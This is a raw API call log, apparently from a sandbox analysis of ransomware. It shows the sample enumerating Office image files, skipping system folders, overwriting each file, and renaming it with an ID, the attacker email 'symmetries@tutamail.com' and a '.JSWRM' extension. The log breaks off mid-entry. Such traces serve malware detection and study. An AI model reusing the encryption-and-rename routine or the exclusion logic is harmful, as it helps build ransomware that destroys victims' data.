1 [0119.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0119.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR35B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0119.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0119.369] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.369] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.369] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.369] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.369] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=4588) returned 1 [0119.370] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.370] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e0) returned 0x24e1d8 [0119.370] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x11e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x11e0, lpOverlapped=0x0) returned 1 [0119.377] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.377] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x11e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x11e0, lpOverlapped=0x0) returned 1 [0119.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.378] CloseHandle (hObject=0x314) returned 1 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0119.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0119.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a390 [0119.378] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a390, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a390 | out: hHeap=0x1e0000) returned 1 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0119.378] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x248058 [0119.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0119.378] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0119.378] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x248058 | out: hHeap=0x1e0000) returned 1 [0119.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0119.379] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.379] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad65103, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad65103, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2bb6, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR35F.GIF", cAlternateFileName="")) returned 1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2=".") returned 1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="..") returned 1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="...") returned 1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="windows") returned -1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="recovery") returned -1 [0119.379] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="perflogs") returned -1 [0119.380] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="documents and settings") returned 1 [0119.380] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.380] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="system volume information") returned -1 [0119.380] lstrcmpiW (lpString1="PDIR35F.GIF", lpString2="msocache") returned 1 [0119.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR35F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411f0 | out: hHeap=0x1e0000) returned 1 [0119.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR35F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR35F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0119.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23da70 [0119.380] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.380] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.380] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0119.380] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35f.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.381] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=11190) returned 1 [0119.381] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.381] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24e1d8 [0119.381] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x2bb0, lpOverlapped=0x0) returned 1 [0119.388] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.388] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x2bb0, lpOverlapped=0x0) returned 1 [0119.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.389] CloseHandle (hObject=0x314) returned 1 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0119.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0119.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0119.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.389] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0119.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0119.389] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0119.389] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35F.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35f.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR35F.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir35f.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2472c8 | out: hHeap=0x1e0000) returned 1 [0119.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0119.390] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0119.390] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad3eea7, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad3eea7, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad65103, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x23e1, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR36B.GIF", cAlternateFileName="")) returned 1 [0119.390] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2=".") returned 1 [0119.390] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="..") returned 1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="...") returned 1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="windows") returned -1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="recovery") returned -1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="perflogs") returned -1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="documents and settings") returned 1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="system volume information") returned -1 [0119.391] lstrcmpiW (lpString1="PDIR36B.GIF", lpString2="msocache") returned 1 [0119.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36B.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR36B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36B.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36B.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR36B.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0119.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0119.391] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23da70 | out: hHeap=0x1e0000) returned 1 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.391] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.391] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0119.391] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36b.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0119.392] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=9185) returned 1 [0119.392] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.392] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x23e0) returned 0x24e1d8 [0119.392] ReadFile (in: hFile=0x314, lpBuffer=0x24e1d8, nNumberOfBytesToRead=0x23e0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesRead=0x345e534*=0x23e0, lpOverlapped=0x0) returned 1 [0119.409] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0119.409] WriteFile (in: hFile=0x314, lpBuffer=0x24e1d8*, nNumberOfBytesToWrite=0x23e0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x24e1d8*, lpNumberOfBytesWritten=0x345e530*=0x23e0, lpOverlapped=0x0) returned 1 [0119.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0119.409] CloseHandle (hObject=0x314) returned 1 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0119.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0119.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0119.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0119.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0119.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0119.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0119.409] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0119.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0119.409] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0119.409] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36B.GIF" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36b.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36B.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\pubspapr\\pdir36b.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0119.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0119.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0119.410] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0119.410] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xad8b362, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xad8b362, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xad8b362, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x8fd7, dwReserved0=0xfffffffe, dwReserved1=0x345e720, cFileName="PDIR36F.GIF", cAlternateFileName="")) returned 1 [0119.410] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2=".") returned 1 [0119.410] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="..") returned 1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="...") returned 1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="windows") returned -1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="recovery") returned -1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="perflogs") returned -1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="documents and settings") returned 1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="$RECYCLE.BIN") returned 1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="system volume information") returned -1 [0119.411] lstrcmpiW (lpString1="PDIR36F.GIF", lpString2="msocache") returned 1 [0119.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36F.GIF", cchWideChar=11, lpMultiByteStr=0x345e870, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR36F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0119.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36F.GIF", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PDIR36F.GIF", cchWideChar=11, lpMultiByteStr=0x345e840, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PDIR36F.GIF", lpUsedDefaultChar=0x0) returned 11 [0119.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0119.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cdf8 [0119.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0119.411] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0119.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0119.411] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\1033\\PUBSPAPR\\PDIR36F.GIF" (normalized: "c:\\program files\\microsoft 